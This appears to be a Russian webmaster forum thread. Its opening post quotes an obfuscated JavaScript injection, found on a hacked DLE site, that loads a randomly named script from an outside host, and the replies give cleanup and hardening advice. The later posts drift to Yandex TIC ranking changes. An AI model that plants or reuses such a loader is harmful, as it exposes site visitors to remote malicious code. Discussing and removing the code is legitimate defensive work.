АП ТИЦ 22.04.2016

[prihod]

Всем привет. Имеется сайт на DLE, но в последнее время антивирус на него ругается, в одном из js-файлов все время дописывается строчка:

Код:

;document.write('<scr'+'ipt '); ;document.write('src="http://berlarmak.ru/'+Math.round(Math.random()*99999)+'.js"'); ;document.write('></scr'+'ipt>');

Как сделать, чтобы она не добавлялась?

[albedo]

1) удалить скрипт
2) Проверить сайт на шелы
3) Сменить пароли от всего
4) Если ничего не помогает - искать дыру и латать
5) Если предыдущее не помогает - ставить права на запись меньшие, проставить .htaccess в папке с яваскриптами, сменить имена ява скриптов и папки
6) Если сменяются права автоматом (по истечению времени) и в логах замечена подозрительная активность (появление левых файлов) - долбить хостера

А так, гадание на кофейной гуще.

[Movut]

Попробуйте скриптом АйБолит проверить сайт. Возможно, он найдет шелл или еще какие плохие скрипты.
_http://www.revisium.com/ai/

[creativepro]

Всем спасибо! Ликвидировать вирус мне помог вот этот парень, за маленькое вознаграждение)

[MrVigner]

Для безопасности убирите права на редактирование, можно даже для всех, вам тоже придется только через панель менять, но по сути их менять то нужно бывает, так что минусов нету. Часто стали дле ломать.

[M_W]

Два сайта, которыми практически не занимаюсь - позабыты-позаброшены +10. Тот, который развивается -10.
Яндекс такой Яндекс (с).

[Gunkin]

У меня вообще без изменений везде., может еще пересчет не закончился.

[nkaado]

Ни с того ни с сего прилетело на один медсайт, на который ссылочки не покупаются уже больше 2-х лет +30 ТИЦа. Ну нафига оно мне там? А вот на парочке, где была 10-ка ее отобрали.

[Zevss]

Да, такого печального апа я что-то и не припомню. Сильно порезало. Плюсов практически нет.

[Exinor]

было 0 стало 90. я аж офигел немного.